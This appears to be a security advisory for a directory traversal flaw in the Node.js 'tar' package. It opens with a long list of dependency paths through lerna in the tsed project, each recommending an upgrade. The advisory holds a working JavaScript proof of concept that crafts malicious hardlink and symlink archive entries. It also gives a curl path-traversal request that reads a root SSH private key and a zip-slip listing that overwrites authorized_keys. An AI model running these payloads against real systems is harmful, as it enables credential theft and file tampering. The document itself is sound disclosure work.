  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.

PoC

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.3 or higher.

References